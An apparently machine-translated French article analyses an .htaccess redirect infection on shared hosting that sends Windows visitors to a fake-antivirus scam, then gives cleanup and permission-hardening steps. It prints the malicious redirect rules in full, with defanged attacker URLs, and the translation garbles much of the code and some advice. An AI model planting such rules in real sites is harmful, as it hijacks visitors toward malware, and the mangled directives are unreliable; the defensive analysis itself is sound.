Une nouvelle forme de virus que je vois pas savoir beaucoup affecter les sites hébergés sur serveurs non sécurisés où les comptes d'utilisateurs / comptes de sous-domaines peuvent être "vus" entre eux. Plus précisément, les comptes d'hébergement sont tous placés dans le dossier "vhosts", Et le droit d'écriture de dossier utilisateur de "vhosts" est donné à un utilisateur général… par le revendeur dans la plupart des situations. C'est une méthode typique des serveurs Web qui n'utilisent pas WHM / cPanel.
Sommaire
Action du virus .Htaccess - Piratage .htaccess
virus affecte les fichiers .htaccess Site de la victime. Les lignes sont ajoutées / directive à rediriger les visiteurs (proviennent de yahoo, msn, google, facebook, yaindex, twitter, myspace, etc. sites et portails à fort trafic) vers certains sites qui proposent "antivirus«. Il s'agit de solutions de faux antivirusA propos de qui je l'ai écrit dans l'introduction Faux Antivirus Remover.
Voici ce qu'il ressemble à un .htaccess affectés (pas accéder aux URL des lignes de contenu ci-dessous)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine On
RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
% RewriteCond {HTTP_REFERER}. * Vivre. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * EBay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Linkedin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Doubleclick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RéécritureCond% {HTTP_REFERER}. *wordpress. * $ [NC, OU]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
% RewriteCond {HTTP_REFERER}. * Demandez. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Recherche. * $ [NC, OR]
RéécritureCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OU]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]REQUEST_FILENAME RewriteCond% {}! -f
REQUEST_FILENAME RewriteCond% {}! -d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]
Ceux qui utilisent WordPress ils trouveront ces lignes dans le fichier .htaccess à partir de public_html. De plus, le virus crée un .htaccess identique dans le dossier wp-content.
*Il existe également des situations dans lesquelles au lieu de peoriavascularsurgery.com, il apparaît dns.thesoulfoodcafe.com ou d'autres adresses.
Que fait ce virus?
Une fois redirigé, le visiteur est accueilli à bras ouverts par le message:
Attention!
Votre ordinateur contient divers signes de présence de virus et de programmes malveillants. votre system nécessite une vérification antivirus immédiate!
System Security effectuera une analyse rapide et gratuite de votre PC contre les virus et les programmes malveillants.
Quel que soit le bouton sur lequel nous appuyons, nous sommes redirigés vers la page "Poste de travail", Créé pour imiter Conception XP. C'est là que le "processus de scan" démarre automatiquement, à la fin duquel on découvre que "nous sommes infectés".
Après avoir appuyé sur OK ou Annuler, il démarre downloadd'un dossier setup.exe. Ce setup.exe est un faux anti-virus affectant le système. Il installera une série d'applications malveillantes pour propager davantage les liens infectés, et en plus un logiciel anti-virus (également faux) que la victime est invitée à acheter.
Ceux qui ont déjà contracté cette forme de virus peuvent l'utiliser Faux Antivirus Remover. Il est également recommandé de scanner l'intégralité du disque dur. recommander Kaspersky Internet Security ou Kaspersky Anti-Virus.
Cette forme de virus affecte les systèmes d'exploitation des visiteurs avec des systèmes d'exploitation Windows XP, Windows ME Windows 2000 Windows NT, Windows 98 si Windows 95. À ce jour, aucun cas d'infection des systèmes d'exploitation n'est connu Windows Vue oui Windows 7.
Comment pouvons-nous supprimer ce virus .htaccess du serveur et comment pouvons-nous empêcher l'infection.
1. Analyse des fichiers et suppression des codes suspects. Pour s'assurer que non seulement le fichier est affecté .htaccess c'est bon de nous analysons tous les fichiers .php si js.
2. Réécrivez le fichier .htaccess et définissez-le chmod 644 ou 744 avec droits d'écriture uniquement sur propriétaire de l'utilisateur.
3. Lors de la création d'un compte d'hébergement pour un site, dans le dossier / home ou / webroot créera automatiquement un dossier contenant le plus souvent le nom d'utilisateur (utilisateur pour cpanel, ftp, etc). Pour éviter l'écriture de données et la transmission de virus d'un utilisateur à un autre, il est recommandé de paramétrer sur chaque dossier utilisateur:
chmod 644 ou 744, 755 – 644 est indiqué.
chown -R nom_utilisateur nom_dossier.
chgrp -R nom_utilisateur nom_dossier
ls -tout pour vérifier si les modes ont été réglés correctement. Quelque chose comme:
drwx - x - x 12 dinamics dinamics 4096 6 mai 14:51 dinamics /
drwx - x - x 10 duran duran 4096 7 mars 07:46 duran /
drwx - x - x 12 tube à essai tube à essai 4096 29 janvier 11:23 tube à essai /
drwxr-xr-x 14 express express 4096 26 février 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19 mai 01:09 ezo /
drwx - x - x 9 farma farma 4096 19 déc 22:29 farma /
Si l'un des utilisateurs ci-dessus aura sur FTP Les fichiers infectés, il ne pourra pas envoyer le virus à un autre utilisateur hébergé. Il s'agit d'une mesure de sécurité minimale pour protéger les comptes hébergés sur un serveur Web.
Éléments communs des domaines affectés par ce type de virus.
Tous les domaines concernés redirigent les visiteurs vers des sites contenant le nom de domaine "/main.php? s = 4 & H" .
Cette "virus .htaccess"Affecte tout type de CMS (Joomla, WordPress, phpBB, etc.) qui utilise .htaccess.
.htaccess Virus Hack & Redirection.
